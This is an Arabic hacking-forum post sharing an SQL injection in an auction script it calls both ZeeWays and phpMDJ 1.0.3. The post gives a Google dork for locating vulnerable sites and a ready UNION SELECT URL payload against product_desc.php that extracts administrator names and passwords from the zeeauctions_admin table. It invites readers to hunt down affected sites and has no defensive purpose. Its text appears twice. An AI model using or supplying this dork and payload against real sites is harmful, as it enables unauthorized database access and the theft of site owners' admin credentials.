ثغرة في ZeeWays Script
السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
طريقة الإستغلال
الثغرة من إكتشاف الأخ SyRiAn_34G13
إن شاء الله تستفيدوا
موفقين بإذن الله ...
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
PHP:
Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com ]طريقة الإستغلال
PHP:
http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--الثغرة من إكتشاف الأخ SyRiAn_34G13
إن شاء الله تستفيدوا
موفقين بإذن الله ...
اسم الموضوع : ثغرة في ZeeWays Script
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات